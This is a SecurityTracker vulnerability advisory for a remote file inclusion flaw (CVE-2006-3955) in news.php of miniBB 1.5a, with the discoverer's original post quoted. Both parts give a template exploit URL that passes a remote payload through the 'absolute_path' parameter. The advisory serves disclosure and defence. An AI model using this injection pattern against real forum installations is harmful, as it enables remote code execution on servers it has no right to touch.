SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   miniBB Vendors:   miniBB.net
miniBB Include File Error in 'news.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016557
SecurityTracker URL:  http://securitytracker.com/id/1016557
CVE Reference:   CVE-2006-3955   (Links to External Site)
Updated:  Jun 13 2008
Original Entry Date:  Jul 24 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.5a
Description:   A vulnerability was reported in miniBB. A remote user can include and execute arbitrary code on the target system.

The 'news.php' script does not properly validate user-supplied input in the 'absolute_path' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/news.php?absolute_path=[shellcode]?

AG-Spider discovered this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.minibb.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  MiniBB Forum <= 1.5a Remote File Include (news.php)

Title : MiniBB Forum <= 1.5a Remote File Include (news.php)
###############################################################################

Discovered By AG-Spider

-----------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : MiniBB Forum 1.5a (news.php)version :  version [ 1.5 ]
exploit     :Remote File Include
-----------------------------------------------------------------------------

Exploit     :
http://[target]/news.php?absolute_path=[shellcode]?
----------------------------------------------------------------------------

greetz4: [ Black-Code  -  KILLERxXx -  KaBaRa.HaCk .eGy]

done

_________________________________________________________________
Be the first to hear what's new at MSN - sign up to our free newsletters! 
http://www.msn.co.uk/newsletters

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC